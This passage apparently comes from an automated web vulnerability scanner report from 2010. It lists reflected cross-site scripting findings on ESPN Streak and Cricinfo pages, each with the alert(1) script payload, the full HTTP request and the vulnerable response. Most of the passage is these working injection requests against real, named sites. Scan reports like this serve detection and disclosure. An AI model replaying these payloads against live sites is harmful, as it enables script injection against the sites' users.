s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 133
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en67f2a<script>alert(1)</script>2fd0abe5ee5/entry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9d1a<script>alert(1)</script>bc676b3bd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryc9d1a<script>alert(1)</script>bc676b3bd41 HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 130
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryc9d1a<script>alert(1)</script>bc676b3bd41</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1f44<script>alert(1)</script>648104297fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf1f44<script>alert(1)</script>648104297fd/entryStats HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 138
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf1f44<script>alert(1)</script>648104297fd/entryStats</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73792<script>alert(1)</script>b498764bc6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryStats73792<script>alert(1)</script>b498764bc6c HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 135
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryStats73792<script>alert(1)</script>b498764bc6c</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f170a<script>alert(1)</script>a531fa92f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf170a<script>alert(1)</script>a531fa92f90/story HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 133
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf170a<script>alert(1)</script>a531fa92f90/story</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f72f3<script>alert(1)</script>5c58c16e8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/storyf72f3<script>alert(1)</script>5c58c16e8fd HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 130
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/storyf72f3<script>alert(1)</script>5c58c16e8fd</BODY></HTML>
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a682"><script>alert(1)</script>a5ecb98fc96 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d4a"><script>alert(1)</script>ae55648a8a6 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2d5"><script>alert(1)</script>b00739a6776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:14:08 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148320
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:08
...[SNIP]...
<input type="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1">
...[SNIP]...
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 264cf"><script>alert(1)</script>5ffea527bb5 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:39 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148519
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:12:39
...[SNIP]...
="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5">
...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5bb4b<script>alert(1)</script>67896ac1a97 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/login_validate.html?callback=?5bb4b<script>alert(1)</script>67896ac1a97 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
2.131. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e3a"><script>alert(1)</script>f099b4e3b36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:18:36 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148438
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:18:36
...[SNIP]...
<input type="hidden" name="referer" value="/member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1">
...[SNIP]...
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6a6"><script>alert(1)</script>dbf3b9311b was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html?sc=masthead9b6a6"><script>alert(1)</script>dbf3b9311b HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:04 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148538 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:17:04 ...[SNIP]... <input type="hidden" name="SourceCategory" value="masthead9b6a6"><script>alert(1)</script>dbf3b9311b"> ...[SNIP]...
The value of the remember request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ee"><script>alert(1)</script>3bb15ef92c9 was submitted in the remember parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /member_mgmt/content/submit/member_mgmt/user_screenname.html?remember=517ee"><script>alert(1)</script>3bb15ef92c9 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:16:53 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 11715
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:16:53
...[SNIP]...
<input type="hidden" name="remember" id="WelcomeScrName" value="517ee"><script>alert(1)</script>3bb15ef92c9">
...[SNIP]...
2.134. http://www.cricinfo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cricinfo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e2"><script>alert(1)</script>8865afff4f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /?e51e2"><script>alert(1)</script>8865afff4f6=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=60
Content-Type: text/html; charset=UTF-8
X-Varnish: 711005270
X-Varnish-Cache: MISS
X-Varnish: 894769522
Date: Sat, 06 Nov 2010 17:30:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-06 17:30:27
...[SNIP]...
<div class="stryEnlarge sectionImgEn" style="padding:0;margin:0 0 0 5px;" onClick="clickMap('index','homepage',null,this,s_omni.prop4,'/ci/content/current/site/index.html?e51e2"><script>alert(1)</script>8865afff4f6=1')">
...[SNIP]...
2.135. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcad"><script>alert(1)</script>7b256488062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 708574769
X-Varnish-Cache: MISS
X-Varnish: 891736454
Date: Sat, 06 Nov 2010 14:03:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-06 14:03:26
...[SNIP]...
<a href="/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1;wrappertype=print" id="printIcon" alt="Print" title="Print">
...[SNIP]...
2.136. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485685.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7798c"><script>alert(1)</script>fb43bde1b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 708563898
X-Varnish-Cache: MISS
X-Varnish: 891722930
Date: Sat, 06 Nov 2010 14:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 151047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci030, country: us, cluster: usa, created: 2010-11-06 14:02:35
...[SNIP]...
<a href="/australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1;wrappertype=print" id="printIcon" alt="Print" title="Print">
...[SNIP]...
2.137. http://www.cricinfo.com/pakistan-v-south-africa-2010/content/story/485578.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be18"><script>alert(1)</script>a66a096602c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 708580736
X-Varnish-Cache: MISS
X-Varnish: 891743888
Date: Sat, 06 Nov 2010 14:03:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci029, country: us, cluster: usa, created: 2010-11-06 14:03:54
...[SNIP]...
<a href="/pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1;wrappertype=print" id="printIcon" alt="Print" title="Print">
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296e5"><script>alert(1)</script>e5a735cc086 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a22ce"><script>alert(1)</script>99653f53917 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
